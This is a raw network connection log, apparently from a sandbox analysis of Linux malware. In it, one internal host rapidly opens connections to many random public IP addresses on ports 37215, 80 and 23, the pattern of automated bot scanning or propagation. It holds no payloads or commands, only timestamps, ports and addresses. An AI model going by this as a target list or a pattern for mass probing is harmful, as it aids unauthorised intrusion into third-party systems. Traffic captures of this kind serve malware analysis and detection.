                                                Dec 3, 2024 22:16:48.744817019 CET3745137215192.168.2.23156.232.15.71
                                                Dec 3, 2024 22:16:48.744817019 CET3745137215192.168.2.23156.165.55.249
                                                Dec 3, 2024 22:16:48.744827032 CET3745137215192.168.2.23156.22.68.24
                                                Dec 3, 2024 22:16:48.744834900 CET3745137215192.168.2.23197.3.10.42
                                                Dec 3, 2024 22:16:48.744848013 CET3745137215192.168.2.23156.14.72.118
                                                Dec 3, 2024 22:16:48.744848967 CET3745137215192.168.2.23197.54.113.228
                                                Dec 3, 2024 22:16:48.744856119 CET3745137215192.168.2.23156.222.87.14
                                                Dec 3, 2024 22:16:48.744860888 CET3745137215192.168.2.23197.31.1.48
                                                Dec 3, 2024 22:16:48.744867086 CET3745137215192.168.2.23197.239.253.24
                                                Dec 3, 2024 22:16:48.744875908 CET3745137215192.168.2.2341.31.2.86
                                                Dec 3, 2024 22:16:48.744889021 CET3745137215192.168.2.2341.110.80.67
                                                Dec 3, 2024 22:16:48.744889021 CET3745137215192.168.2.23156.54.143.20
                                                Dec 3, 2024 22:16:48.744889975 CET3745137215192.168.2.23156.49.184.105
                                                Dec 3, 2024 22:16:48.744893074 CET3745137215192.168.2.23156.99.104.184
                                                Dec 3, 2024 22:16:48.744899035 CET3745137215192.168.2.2341.251.198.81
                                                Dec 3, 2024 22:16:48.744901896 CET3745137215192.168.2.2341.171.179.199
                                                Dec 3, 2024 22:16:48.744906902 CET3745137215192.168.2.23156.69.95.163
                                                Dec 3, 2024 22:16:48.744920015 CET3745137215192.168.2.23156.106.16.40
                                                Dec 3, 2024 22:16:48.744932890 CET3745137215192.168.2.2341.1.159.215
                                                Dec 3, 2024 22:16:48.744932890 CET3745137215192.168.2.23197.36.175.83
                                                Dec 3, 2024 22:16:48.744936943 CET3745137215192.168.2.2341.52.138.200
                                                Dec 3, 2024 22:16:48.744941950 CET3745137215192.168.2.2341.60.121.27
                                                Dec 3, 2024 22:16:48.744945049 CET3745137215192.168.2.23197.109.167.241
                                                Dec 3, 2024 22:16:48.744949102 CET3745137215192.168.2.23197.250.38.219
                                                Dec 3, 2024 22:16:48.744959116 CET3745137215192.168.2.2341.90.237.196
                                                Dec 3, 2024 22:16:48.744965076 CET3745137215192.168.2.2341.199.138.100
                                                Dec 3, 2024 22:16:48.744966984 CET3745137215192.168.2.23197.172.227.93
                                                Dec 3, 2024 22:16:48.744972944 CET3745137215192.168.2.23197.75.108.162
                                                Dec 3, 2024 22:16:48.744988918 CET3745137215192.168.2.23156.132.186.141
                                                Dec 3, 2024 22:16:48.744996071 CET3745137215192.168.2.23156.24.63.252
                                                Dec 3, 2024 22:16:48.745003939 CET3745137215192.168.2.23156.239.159.196
                                                Dec 3, 2024 22:16:48.745011091 CET3745137215192.168.2.2341.39.14.185
                                                Dec 3, 2024 22:16:48.745013952 CET3745137215192.168.2.23156.198.37.201
                                                Dec 3, 2024 22:16:48.745023012 CET3745137215192.168.2.23156.163.6.52
                                                Dec 3, 2024 22:16:48.745029926 CET3745137215192.168.2.23197.151.159.252
                                                Dec 3, 2024 22:16:48.745032072 CET3745137215192.168.2.2341.246.74.218
                                                Dec 3, 2024 22:16:48.745043039 CET3745137215192.168.2.23197.191.27.157
                                                Dec 3, 2024 22:16:48.745049953 CET3745137215192.168.2.23156.55.35.74
                                                Dec 3, 2024 22:16:48.745050907 CET3745137215192.168.2.23197.95.142.72
                                                Dec 3, 2024 22:16:48.745062113 CET3745137215192.168.2.23156.225.71.48
                                                Dec 3, 2024 22:16:48.745066881 CET3745137215192.168.2.23156.120.248.66
                                                Dec 3, 2024 22:16:48.745069027 CET3745137215192.168.2.2341.63.96.82
                                                Dec 3, 2024 22:16:48.745085955 CET3745137215192.168.2.2341.122.198.74
                                                Dec 3, 2024 22:16:48.745086908 CET3745137215192.168.2.2341.59.122.1
                                                Dec 3, 2024 22:16:48.745094061 CET3745137215192.168.2.23197.227.27.239
                                                Dec 3, 2024 22:16:48.745099068 CET3745137215192.168.2.2341.130.180.239
                                                Dec 3, 2024 22:16:48.745107889 CET3745137215192.168.2.2341.102.20.18
                                                Dec 3, 2024 22:16:48.745109081 CET3745137215192.168.2.2341.163.72.59
                                                Dec 3, 2024 22:16:48.745112896 CET3745137215192.168.2.23197.28.251.66
                                                Dec 3, 2024 22:16:48.745130062 CET3745137215192.168.2.23156.82.57.151
                                                Dec 3, 2024 22:16:48.745136023 CET3745137215192.168.2.23197.55.215.136
                                                Dec 3, 2024 22:16:48.745142937 CET3745137215192.168.2.2341.121.39.59
                                                Dec 3, 2024 22:16:48.745146990 CET3745137215192.168.2.2341.77.179.77
                                                Dec 3, 2024 22:16:48.745148897 CET3745137215192.168.2.23156.227.14.253
                                                Dec 3, 2024 22:16:48.745161057 CET3745137215192.168.2.2341.70.9.204
                                                Dec 3, 2024 22:16:48.745172024 CET3745137215192.168.2.2341.86.20.190
                                                Dec 3, 2024 22:16:48.745176077 CET3745137215192.168.2.2341.25.2.28
                                                Dec 3, 2024 22:16:48.745186090 CET3745137215192.168.2.23156.87.202.29
                                                Dec 3, 2024 22:16:48.745187044 CET3745137215192.168.2.23197.127.104.125
                                                Dec 3, 2024 22:16:48.745198965 CET3745137215192.168.2.23197.198.239.244
                                                Dec 3, 2024 22:16:48.745201111 CET3745137215192.168.2.23156.150.218.206
                                                Dec 3, 2024 22:16:48.745212078 CET3745137215192.168.2.23156.72.9.48
                                                Dec 3, 2024 22:16:48.745213985 CET3745137215192.168.2.23197.150.67.187
                                                Dec 3, 2024 22:16:48.745218039 CET3745137215192.168.2.2341.110.226.191
                                                Dec 3, 2024 22:16:48.745229959 CET3745137215192.168.2.23197.240.4.183
                                                Dec 3, 2024 22:16:48.745240927 CET3745137215192.168.2.23197.131.154.90
                                                Dec 3, 2024 22:16:48.745244980 CET3745137215192.168.2.23156.112.82.194
                                                Dec 3, 2024 22:16:48.745246887 CET3745137215192.168.2.23156.71.226.173
                                                Dec 3, 2024 22:16:48.745251894 CET3745137215192.168.2.23197.22.154.207
                                                Dec 3, 2024 22:16:48.745260954 CET3745137215192.168.2.23156.127.103.36
                                                Dec 3, 2024 22:16:48.745261908 CET3745137215192.168.2.23156.231.165.163
                                                Dec 3, 2024 22:16:48.745269060 CET3745137215192.168.2.23156.16.135.42
                                                Dec 3, 2024 22:16:48.745277882 CET3745137215192.168.2.2341.29.242.161
                                                Dec 3, 2024 22:16:48.745284081 CET3745137215192.168.2.23197.5.201.3
                                                Dec 3, 2024 22:16:48.745289087 CET3745137215192.168.2.23156.87.101.28
                                                Dec 3, 2024 22:16:48.745289087 CET3745137215192.168.2.23197.158.99.128
                                                Dec 3, 2024 22:16:48.745301008 CET3745137215192.168.2.23156.89.105.233
                                                Dec 3, 2024 22:16:48.745302916 CET3745137215192.168.2.23156.10.180.234
                                                Dec 3, 2024 22:16:48.745306969 CET3745137215192.168.2.23197.87.102.157
                                                Dec 3, 2024 22:16:48.745311022 CET3745137215192.168.2.23197.247.84.84
                                                Dec 3, 2024 22:16:48.745316029 CET3745137215192.168.2.23156.182.96.95
                                                Dec 3, 2024 22:16:48.745321035 CET3745137215192.168.2.2341.228.99.248
                                                Dec 3, 2024 22:16:48.745328903 CET3745137215192.168.2.2341.60.139.248
                                                Dec 3, 2024 22:16:48.745340109 CET3745137215192.168.2.2341.24.11.219
                                                Dec 3, 2024 22:16:48.745341063 CET3745137215192.168.2.23197.248.31.248
                                                Dec 3, 2024 22:16:48.745347023 CET3745137215192.168.2.23197.105.250.44
                                                Dec 3, 2024 22:16:48.745358944 CET3745137215192.168.2.2341.247.80.239
                                                Dec 3, 2024 22:16:48.745363951 CET3745137215192.168.2.23197.99.163.59
                                                Dec 3, 2024 22:16:48.745368958 CET3745137215192.168.2.23156.192.69.177
                                                Dec 3, 2024 22:16:48.745374918 CET3745137215192.168.2.23197.188.179.78
                                                Dec 3, 2024 22:16:48.745378017 CET3745137215192.168.2.2341.121.125.39
                                                Dec 3, 2024 22:16:48.745389938 CET3745137215192.168.2.2341.223.242.140
                                                Dec 3, 2024 22:16:48.745393038 CET3745137215192.168.2.2341.135.181.241
                                                Dec 3, 2024 22:16:48.745398045 CET3745137215192.168.2.2341.226.225.79
                                                Dec 3, 2024 22:16:48.745408058 CET3745137215192.168.2.2341.59.67.43
                                                Dec 3, 2024 22:16:48.745408058 CET3745137215192.168.2.23197.54.116.157
                                                Dec 3, 2024 22:16:48.745417118 CET3745137215192.168.2.23197.196.250.114
                                                Dec 3, 2024 22:16:48.745424986 CET3745137215192.168.2.23197.251.83.229
                                                Dec 3, 2024 22:16:48.745431900 CET3745137215192.168.2.2341.63.67.14
                                                Dec 3, 2024 22:16:48.745445967 CET3745137215192.168.2.23156.70.238.92
                                                Dec 3, 2024 22:16:48.745455027 CET3745137215192.168.2.23156.166.75.82
                                                Dec 3, 2024 22:16:48.745460987 CET3745137215192.168.2.23156.71.42.189
                                                Dec 3, 2024 22:16:48.745475054 CET3745137215192.168.2.23197.3.145.217
                                                Dec 3, 2024 22:16:48.745475054 CET3745137215192.168.2.23156.228.26.95
                                                Dec 3, 2024 22:16:48.747520924 CET8058412191.107.11.36192.168.2.23
                                                Dec 3, 2024 22:16:48.747787952 CET8058530191.107.11.36192.168.2.23
                                                Dec 3, 2024 22:16:48.747834921 CET5853080192.168.2.23191.107.11.36
                                                Dec 3, 2024 22:16:48.747845888 CET5853080192.168.2.23191.107.11.36
                                                Dec 3, 2024 22:16:48.759358883 CET8058214159.56.174.211192.168.2.23
                                                Dec 3, 2024 22:16:48.759638071 CET8058288159.56.174.211192.168.2.23
                                                Dec 3, 2024 22:16:48.759687901 CET5828880192.168.2.23159.56.174.211
                                                Dec 3, 2024 22:16:48.759716034 CET5828880192.168.2.23159.56.174.211
                                                Dec 3, 2024 22:16:48.767513990 CET804400293.134.211.187192.168.2.23
                                                Dec 3, 2024 22:16:48.767601013 CET805480269.105.106.1192.168.2.23
                                                Dec 3, 2024 22:16:48.767807961 CET804885276.65.219.244192.168.2.23
                                                Dec 3, 2024 22:16:48.768012047 CET804889676.65.219.244192.168.2.23
                                                Dec 3, 2024 22:16:48.768070936 CET4889680192.168.2.2376.65.219.244
                                                Dec 3, 2024 22:16:48.768106937 CET4889680192.168.2.2376.65.219.244
                                                Dec 3, 2024 22:16:48.771621943 CET8038168136.30.197.42192.168.2.23
                                                Dec 3, 2024 22:16:48.771631002 CET803657853.119.123.13192.168.2.23
                                                Dec 3, 2024 22:16:48.771639109 CET8041946108.128.143.21192.168.2.23
                                                Dec 3, 2024 22:16:48.771645069 CET805790423.13.227.180192.168.2.23
                                                Dec 3, 2024 22:16:48.775499105 CET8058950213.10.8.153192.168.2.23
                                                Dec 3, 2024 22:16:48.775588989 CET8056994106.125.175.246192.168.2.23
                                                Dec 3, 2024 22:16:48.775597095 CET8035632217.15.168.25192.168.2.23
                                                Dec 3, 2024 22:16:48.775600910 CET80513325.50.172.102192.168.2.23
                                                Dec 3, 2024 22:16:48.775608063 CET805380446.29.80.182192.168.2.23
                                                Dec 3, 2024 22:16:48.783555031 CET8049430142.163.169.148192.168.2.23
                                                Dec 3, 2024 22:16:48.795541048 CET8058412191.107.11.36192.168.2.23
                                                Dec 3, 2024 22:16:48.803625107 CET8058214159.56.174.211192.168.2.23
                                                Dec 3, 2024 22:16:48.811530113 CET804885276.65.219.244192.168.2.23
                                                Dec 3, 2024 22:16:48.850400925 CET803674853.119.123.13192.168.2.23
                                                Dec 3, 2024 22:16:48.850739002 CET3674880192.168.2.2353.119.123.13
                                                Dec 3, 2024 22:16:48.850933075 CET805807423.13.227.180192.168.2.23
                                                Dec 3, 2024 22:16:48.850980997 CET5807480192.168.2.2323.13.227.180
                                                Dec 3, 2024 22:16:48.851515055 CET8038338136.30.197.42192.168.2.23
                                                Dec 3, 2024 22:16:48.851524115 CET8042116108.128.143.21192.168.2.23
                                                Dec 3, 2024 22:16:48.851557970 CET8042116108.128.143.21192.168.2.23
                                                Dec 3, 2024 22:16:48.851623058 CET4211680192.168.2.23108.128.143.21
                                                Dec 3, 2024 22:16:48.851962090 CET8038338136.30.197.42192.168.2.23
                                                Dec 3, 2024 22:16:48.852021933 CET3833880192.168.2.23136.30.197.42
                                                Dec 3, 2024 22:16:48.852499008 CET805397446.29.80.182192.168.2.23
                                                Dec 3, 2024 22:16:48.852543116 CET5397480192.168.2.2346.29.80.182
                                                Dec 3, 2024 22:16:48.852818012 CET80515025.50.172.102192.168.2.23
                                                Dec 3, 2024 22:16:48.852853060 CET5150280192.168.2.235.50.172.102
                                                Dec 3, 2024 22:16:48.853009939 CET8035802217.15.168.25192.168.2.23
                                                Dec 3, 2024 22:16:48.853049994 CET3580280192.168.2.23217.15.168.25
                                                Dec 3, 2024 22:16:48.853491068 CET8057164106.125.175.246192.168.2.23
                                                Dec 3, 2024 22:16:48.853534937 CET5716480192.168.2.23106.125.175.246
                                                Dec 3, 2024 22:16:48.859996080 CET8049576142.163.169.148192.168.2.23
                                                Dec 3, 2024 22:16:48.860065937 CET4957680192.168.2.23142.163.169.148
                                                Dec 3, 2024 22:16:48.863806963 CET3721537451197.193.108.120192.168.2.23
                                                Dec 3, 2024 22:16:48.863816977 CET3721537451197.26.74.237192.168.2.23
                                                Dec 3, 2024 22:16:48.863863945 CET3745137215192.168.2.23197.193.108.120
                                                Dec 3, 2024 22:16:48.863864899 CET3745137215192.168.2.23197.26.74.237
                                                Dec 3, 2024 22:16:48.863888979 CET372153745141.7.124.25192.168.2.23
                                                Dec 3, 2024 22:16:48.863922119 CET3721537451197.166.40.133192.168.2.23
                                                Dec 3, 2024 22:16:48.863930941 CET372153745141.30.218.207192.168.2.23
                                                Dec 3, 2024 22:16:48.863941908 CET3745137215192.168.2.2341.7.124.25
                                                Dec 3, 2024 22:16:48.863954067 CET3745137215192.168.2.23197.166.40.133
                                                Dec 3, 2024 22:16:48.863965988 CET3745137215192.168.2.2341.30.218.207
                                                Dec 3, 2024 22:16:48.864048958 CET3721537451197.132.62.119192.168.2.23
                                                Dec 3, 2024 22:16:48.864058018 CET3721537451156.81.76.10192.168.2.23
                                                Dec 3, 2024 22:16:48.864065886 CET3721537451156.170.127.69192.168.2.23
                                                Dec 3, 2024 22:16:48.864073992 CET3721537451156.126.99.239192.168.2.23
                                                Dec 3, 2024 22:16:48.864083052 CET3745137215192.168.2.23197.132.62.119
                                                Dec 3, 2024 22:16:48.864094973 CET3745137215192.168.2.23156.170.127.69
                                                Dec 3, 2024 22:16:48.864094019 CET3745137215192.168.2.23156.81.76.10
                                                Dec 3, 2024 22:16:48.864108086 CET3745137215192.168.2.23156.126.99.239
                                                Dec 3, 2024 22:16:48.868423939 CET8058530191.107.11.36192.168.2.23
                                                Dec 3, 2024 22:16:48.868480921 CET5853080192.168.2.23191.107.11.36
                                                Dec 3, 2024 22:16:48.881978989 CET8058288159.56.174.211192.168.2.23
                                                Dec 3, 2024 22:16:48.882178068 CET5828880192.168.2.23159.56.174.211
                                                Dec 3, 2024 22:16:48.890743017 CET804889676.65.219.244192.168.2.23
                                                Dec 3, 2024 22:16:48.890796900 CET4889680192.168.2.2376.65.219.244
                                                Dec 3, 2024 22:16:49.364073038 CET5196680192.168.2.23115.64.13.91
                                                Dec 3, 2024 22:16:49.364073038 CET5199280192.168.2.2344.100.34.190
                                                Dec 3, 2024 22:16:49.364073038 CET3553480192.168.2.2344.223.88.222
                                                Dec 3, 2024 22:16:49.364077091 CET5387880192.168.2.23219.159.129.91
                                                Dec 3, 2024 22:16:49.364073038 CET4619680192.168.2.2359.87.238.43
                                                Dec 3, 2024 22:16:49.364078999 CET4274080192.168.2.23126.110.141.44
                                                Dec 3, 2024 22:16:49.364083052 CET5060680192.168.2.23106.119.111.49
                                                Dec 3, 2024 22:16:49.364077091 CET3602480192.168.2.23161.83.220.85
                                                Dec 3, 2024 22:16:49.396024942 CET4271880192.168.2.23200.134.217.200
                                                Dec 3, 2024 22:16:49.396025896 CET5027480192.168.2.23122.157.177.130
                                                Dec 3, 2024 22:16:49.396090984 CET3945280192.168.2.23150.32.225.133
                                                Dec 3, 2024 22:16:49.396095991 CET4436037215192.168.2.23156.101.171.54
                                                Dec 3, 2024 22:16:49.396095991 CET5983880192.168.2.238.163.124.143
                                                Dec 3, 2024 22:16:49.396096945 CET4035480192.168.2.23177.102.58.160
                                                Dec 3, 2024 22:16:49.396096945 CET3610080192.168.2.23148.77.50.206
                                                Dec 3, 2024 22:16:49.396096945 CET5588280192.168.2.2370.48.67.132
                                                Dec 3, 2024 22:16:49.396099091 CET4553080192.168.2.231.78.144.178
                                                Dec 3, 2024 22:16:49.396097898 CET3780280192.168.2.23205.37.220.224
                                                Dec 3, 2024 22:16:49.396100044 CET3669680192.168.2.2383.228.148.68
                                                Dec 3, 2024 22:16:49.396100044 CET5081480192.168.2.23189.63.67.242
                                                Dec 3, 2024 22:16:49.396100044 CET5454480192.168.2.23137.84.118.55
                                                Dec 3, 2024 22:16:49.396100044 CET5751080192.168.2.23117.255.80.131
                                                Dec 3, 2024 22:16:49.396120071 CET5367880192.168.2.2313.77.179.192
                                                Dec 3, 2024 22:16:49.396122932 CET4238480192.168.2.2395.148.172.170
                                                Dec 3, 2024 22:16:49.396122932 CET4331680192.168.2.23115.161.242.231
                                                Dec 3, 2024 22:16:49.396122932 CET5007480192.168.2.23178.167.225.20
                                                Dec 3, 2024 22:16:49.396122932 CET5574880192.168.2.2350.18.129.224
                                                Dec 3, 2024 22:16:49.396122932 CET3555880192.168.2.23159.216.106.173
                                                Dec 3, 2024 22:16:49.396122932 CET3575280192.168.2.23112.106.103.207
                                                Dec 3, 2024 22:16:49.396125078 CET4616480192.168.2.23120.53.85.174
                                                Dec 3, 2024 22:16:49.396125078 CET5150480192.168.2.23120.125.222.84
                                                Dec 3, 2024 22:16:49.396125078 CET4142680192.168.2.23202.130.12.212
                                                Dec 3, 2024 22:16:49.396130085 CET4269880192.168.2.2386.87.136.30
                                                Dec 3, 2024 22:16:49.396130085 CET5864823192.168.2.23126.0.124.156
                                                Dec 3, 2024 22:16:49.396130085 CET3439223192.168.2.2369.227.41.87
                                                Dec 3, 2024 22:16:49.396143913 CET5639080192.168.2.23201.216.93.118
                                                Dec 3, 2024 22:16:49.396143913 CET4549680192.168.2.23161.115.163.88
                                                Dec 3, 2024 22:16:49.396147013 CET5115023192.168.2.2385.186.163.112
                                                Dec 3, 2024 22:16:49.396146059 CET3405080192.168.2.23133.151.36.237
                                                Dec 3, 2024 22:16:49.396147013 CET4924280192.168.2.23156.47.9.159
                                                Dec 3, 2024 22:16:49.396146059 CET5637480192.168.2.23163.247.225.173
                                                Dec 3, 2024 22:16:49.396143913 CET5948880192.168.2.2389.148.112.82
                                                Dec 3, 2024 22:16:49.396146059 CET3795080192.168.2.23159.180.151.117
                                                Dec 3, 2024 22:16:49.396150112 CET3551080192.168.2.2319.67.64.37
                                                Dec 3, 2024 22:16:49.396143913 CET3374680192.168.2.2351.0.21.42
                                                Dec 3, 2024 22:16:49.396146059 CET3307080192.168.2.23116.198.57.17
                                                Dec 3, 2024 22:16:49.396147013 CET4458880192.168.2.23186.244.224.1
                                                Dec 3, 2024 22:16:49.396146059 CET4406480192.168.2.232.116.62.181
                                                Dec 3, 2024 22:16:49.396147013 CET4060280192.168.2.2318.120.91.237
                                                Dec 3, 2024 22:16:49.396143913 CET3790480192.168.2.23208.170.5.222
                                                Dec 3, 2024 22:16:49.396146059 CET4826880192.168.2.2370.167.174.224
                                                Dec 3, 2024 22:16:49.396143913 CET5201280192.168.2.23101.26.29.84
                                                Dec 3, 2024 22:16:49.396150112 CET5434080192.168.2.2389.199.198.11
                                                Dec 3, 2024 22:16:49.396146059 CET5283680192.168.2.2383.119.82.146
                                                Dec 3, 2024 22:16:49.396143913 CET4170280192.168.2.2386.199.183.40
                                                Dec 3, 2024 22:16:49.396146059 CET6092680192.168.2.2332.60.240.155
                                                Dec 3, 2024 22:16:49.396145105 CET3968080192.168.2.23149.70.197.245
                                                Dec 3, 2024 22:16:49.396150112 CET4886680192.168.2.2349.132.127.254
                                                Dec 3, 2024 22:16:49.396145105 CET4121880192.168.2.2372.185.180.188
                                                Dec 3, 2024 22:16:49.396147013 CET3778680192.168.2.2366.28.161.170
                                                Dec 3, 2024 22:16:49.396145105 CET4976223192.168.2.2384.250.63.142
                                                Dec 3, 2024 22:16:49.396162033 CET5674423192.168.2.2367.125.181.147
                                                Dec 3, 2024 22:16:49.396145105 CET5183223192.168.2.23207.205.163.55
                                                Dec 3, 2024 22:16:49.396145105 CET5224880192.168.2.23182.205.184.220
                                                Dec 3, 2024 22:16:49.396150112 CET6017680192.168.2.2399.212.18.166
                                                Dec 3, 2024 22:16:49.396147013 CET3348880192.168.2.23125.111.75.105
                                                Dec 3, 2024 22:16:49.396150112 CET3692823192.168.2.2371.97.180.91
                                                Dec 3, 2024 22:16:49.396162033 CET5169623192.168.2.23105.129.205.237
                                                Dec 3, 2024 22:16:49.396145105 CET4637023192.168.2.2372.232.178.253
                                                Dec 3, 2024 22:16:49.396147013 CET5172623192.168.2.23137.254.102.214
                                                Dec 3, 2024 22:16:49.396150112 CET4163423192.168.2.23199.226.100.20
                                                Dec 3, 2024 22:16:49.396145105 CET4225223192.168.2.23196.124.77.83
                                                Dec 3, 2024 22:16:49.396181107 CET3476080192.168.2.23210.36.162.136
                                                Dec 3, 2024 22:16:49.396181107 CET5573823192.168.2.23107.69.147.38
                                                Dec 3, 2024 22:16:49.396215916 CET3746223192.168.2.23223.212.231.178
                                                Dec 3, 2024 22:16:49.396215916 CET3918623192.168.2.23222.167.34.249
                                                Dec 3, 2024 22:16:49.396219015 CET4200823192.168.2.23196.58.181.140
                                                Dec 3, 2024 22:16:49.396219015 CET5348623192.168.2.23162.137.178.59
                                                Dec 3, 2024 22:16:49.396228075 CET5998223192.168.2.2376.201.207.93
                                                Dec 3, 2024 22:16:49.396228075 CET4397023192.168.2.23122.176.239.116
                                                Dec 3, 2024 22:16:49.396229982 CET5657023192.168.2.23132.119.233.12
                                                Dec 3, 2024 22:16:49.396229982 CET4583023192.168.2.2332.137.169.20
                                                Dec 3, 2024 22:16:49.396229982 CET3982023192.168.2.23103.50.36.160
                                                Dec 3, 2024 22:16:49.396229982 CET5378023192.168.2.23138.89.51.182
                                                Dec 3, 2024 22:16:49.396229982 CET3299023192.168.2.2340.109.68.74
                                                Dec 3, 2024 22:16:49.396229982 CET4332623192.168.2.2312.197.33.14
                                                Dec 3, 2024 22:16:49.396229982 CET5830223192.168.2.23187.155.171.67
                                                Dec 3, 2024 22:16:49.396229982 CET4666423192.168.2.23148.141.213.187
                                                Dec 3, 2024 22:16:49.396229982 CET3615223192.168.2.2358.42.128.10
                                                Dec 3, 2024 22:16:49.396229982 CET4149423192.168.2.23166.116.124.142
                                                Dec 3, 2024 22:16:49.396253109 CET3717680192.168.2.231.252.247.68
                                                Dec 3, 2024 22:16:49.396253109 CET3448280192.168.2.2364.69.46.207
                                                Dec 3, 2024 22:16:49.396253109 CET4027680192.168.2.238.43.2.155
                                                Dec 3, 2024 22:16:49.396253109 CET4483080192.168.2.2323.93.194.133
                                                Dec 3, 2024 22:16:49.396253109 CET3869223192.168.2.23221.249.81.198
                                                Dec 3, 2024 22:16:49.396253109 CET4574623192.168.2.239.25.140.107
                                                Dec 3, 2024 22:16:49.396260023 CET5892623192.168.2.23167.201.159.17
                                                Dec 3, 2024 22:16:49.396261930 CET4567823192.168.2.23166.178.40.154
                                                Dec 3, 2024 22:16:49.396261930 CET5197423192.168.2.23120.34.41.226
                                                Dec 3, 2024 22:16:49.396262884 CET4116423192.168.2.2338.37.142.117
                                                Dec 3, 2024 22:16:49.396264076 CET4917423192.168.2.2347.182.6.32
                                                Dec 3, 2024 22:16:49.396264076 CET4407823192.168.2.2381.174.14.55
                                                Dec 3, 2024 22:16:49.396262884 CET4252423192.168.2.23105.78.15.47
                                                Dec 3, 2024 22:16:49.396264076 CET6024623192.168.2.23122.183.52.229
                                                Dec 3, 2024 22:16:49.396262884 CET3889423192.168.2.23137.65.128.222
                                                Dec 3, 2024 22:16:49.396264076 CET3620223192.168.2.2312.225.5.44
                                                Dec 3, 2024 22:16:49.396279097 CET4165623192.168.2.2365.17.144.215
                                                Dec 3, 2024 22:16:49.396279097 CET4927823192.168.2.2324.173.255.63
                                                Dec 3, 2024 22:16:49.428081989 CET5560680192.168.2.23138.128.101.135
                                                Dec 3, 2024 22:16:49.428081989 CET3712480192.168.2.2352.147.152.231
                                                Dec 3, 2024 22:16:49.428081989 CET3404223192.168.2.23200.179.142.186
                                                Dec 3, 2024 22:16:49.428081989 CET4798823192.168.2.23213.100.154.141
                                                Dec 3, 2024 22:16:49.428081989 CET4016623192.168.2.23157.41.24.138
                                                Dec 3, 2024 22:16:49.428092003 CET5318223192.168.2.2314.97.93.179
                                                Dec 3, 2024 22:16:49.428093910 CET4915480192.168.2.23107.229.45.191
                                                Dec 3, 2024 22:16:49.428093910 CET5508680192.168.2.232.233.134.116
                                                Dec 3, 2024 22:16:49.428093910 CET5520623192.168.2.2338.168.179.82
                                                Dec 3, 2024 22:16:49.428096056 CET5642480192.168.2.23145.20.17.13
                                                Dec 3, 2024 22:16:49.428096056 CET5270223192.168.2.23130.157.140.107
                                                Dec 3, 2024 22:16:49.428103924 CET4100680192.168.2.2397.55.138.48
                                                Dec 3, 2024 22:16:49.428102016 CET5182080192.168.2.23110.23.29.220
                                                Dec 3, 2024 22:16:49.428103924 CET4599480192.168.2.2393.104.201.65
                                                Dec 3, 2024 22:16:49.428103924 CET4161880192.168.2.23101.211.231.251
                                                Dec 3, 2024 22:16:49.428105116 CET4388623192.168.2.23211.12.225.239
                                                Dec 3, 2024 22:16:49.428103924 CET3286223192.168.2.2372.149.206.7
                                                Dec 3, 2024 22:16:49.428102016 CET4884423192.168.2.23152.252.247.173
                                                Dec 3, 2024 22:16:49.428105116 CET4838023192.168.2.2358.65.250.96
                                                Dec 3, 2024 22:16:49.428103924 CET3937823192.168.2.2379.53.251.48
                                                Dec 3, 2024 22:16:49.428105116 CET4811680192.168.2.2354.6.47.124
                                                Dec 3, 2024 22:16:49.428105116 CET5284823192.168.2.2341.247.141.109
                                                Dec 3, 2024 22:16:49.428102016 CET3850223192.168.2.2342.86.18.115
                                                Dec 3, 2024 22:16:49.428105116 CET5876823192.168.2.23220.156.31.62
                                                Dec 3, 2024 22:16:49.428102016 CET5258623192.168.2.2384.217.119.41
                                                Dec 3, 2024 22:16:49.428105116 CET4055623192.168.2.23175.61.25.68
                                                Dec 3, 2024 22:16:49.428147078 CET4476280192.168.2.23201.157.7.217
                                                Dec 3, 2024 22:16:49.428147078 CET3953023192.168.2.2389.98.132.205
                                                Dec 3, 2024 22:16:49.428147078 CET3688823192.168.2.23112.192.47.84
                                                Dec 3, 2024 22:16:49.428147078 CET4814823192.168.2.23125.84.57.9
                                                Dec 3, 2024 22:16:49.428148985 CET5539080192.168.2.23103.104.235.120
                                                Dec 3, 2024 22:16:49.428149939 CET3484880192.168.2.2373.104.148.95
                                                Dec 3, 2024 22:16:49.428149939 CET3335280192.168.2.23213.75.138.155
                                                Dec 3, 2024 22:16:49.428149939 CET3876223192.168.2.2314.136.60.58
                                                Dec 3, 2024 22:16:49.428149939 CET4001223192.168.2.2349.223.63.176
                                                Dec 3, 2024 22:16:49.428150892 CET5407280192.168.2.23194.18.61.94
                                                Dec 3, 2024 22:16:49.428149939 CET4136623192.168.2.2361.140.179.31
                                                Dec 3, 2024 22:16:49.428150892 CET4023623192.168.2.23148.28.150.230
                                                Dec 3, 2024 22:16:49.428149939 CET3790023192.168.2.23176.247.191.135
                                                Dec 3, 2024 22:16:49.428149939 CET6095623192.168.2.2393.95.253.23
                                                Dec 3, 2024 22:16:49.428150892 CET3524223192.168.2.23197.93.225.174
                                                Dec 3, 2024 22:16:49.428157091 CET4013280192.168.2.23128.106.21.141
                                                Dec 3, 2024 22:16:49.428149939 CET5954023192.168.2.23166.84.255.141
                                                Dec 3, 2024 22:16:49.428149939 CET5496423192.168.2.23116.184.207.141
                                                Dec 3, 2024 22:16:49.428157091 CET5300223192.168.2.2380.44.160.30
                                                Dec 3, 2024 22:16:49.428149939 CET4670223192.168.2.2325.6.238.245
                                                Dec 3, 2024 22:16:49.428149939 CET4759023192.168.2.23199.11.198.104
                                                Dec 3, 2024 22:16:49.428150892 CET4159823192.168.2.23117.139.0.81
                                                Dec 3, 2024 22:16:49.428157091 CET5448023192.168.2.23125.237.138.50
                                                Dec 3, 2024 22:16:49.428150892 CET5437223192.168.2.23110.166.149.61
                                                Dec 3, 2024 22:16:49.428157091 CET4454623192.168.2.23208.86.31.164
                                                Dec 3, 2024 22:16:49.428150892 CET5224023192.168.2.23180.102.127.3
                                                Dec 3, 2024 22:16:49.428157091 CET5095023192.168.2.23216.78.50.24
                                                Dec 3, 2024 22:16:49.428157091 CET5748023192.168.2.2364.67.194.159
                                                Dec 3, 2024 22:16:49.428157091 CET3895023192.168.2.23195.45.33.112
                                                Dec 3, 2024 22:16:49.428170919 CET6008680192.168.2.23176.10.51.162
                                                Dec 3, 2024 22:16:49.428170919 CET3686480192.168.2.23159.157.188.52
                                                Dec 3, 2024 22:16:49.428170919 CET5852223192.168.2.23211.170.195.29
                                                Dec 3, 2024 22:16:49.428170919 CET4536223192.168.2.2340.190.232.121
                                                Dec 3, 2024 22:16:49.428170919 CET5403623192.168.2.2360.141.204.104
                                                Dec 3, 2024 22:16:49.428170919 CET4697823192.168.2.23105.153.112.0
                                                Dec 3, 2024 22:16:49.428170919 CET6028023192.168.2.23145.39.58.37
                                                Dec 3, 2024 22:16:49.428170919 CET5523023192.168.2.2392.59.47.37
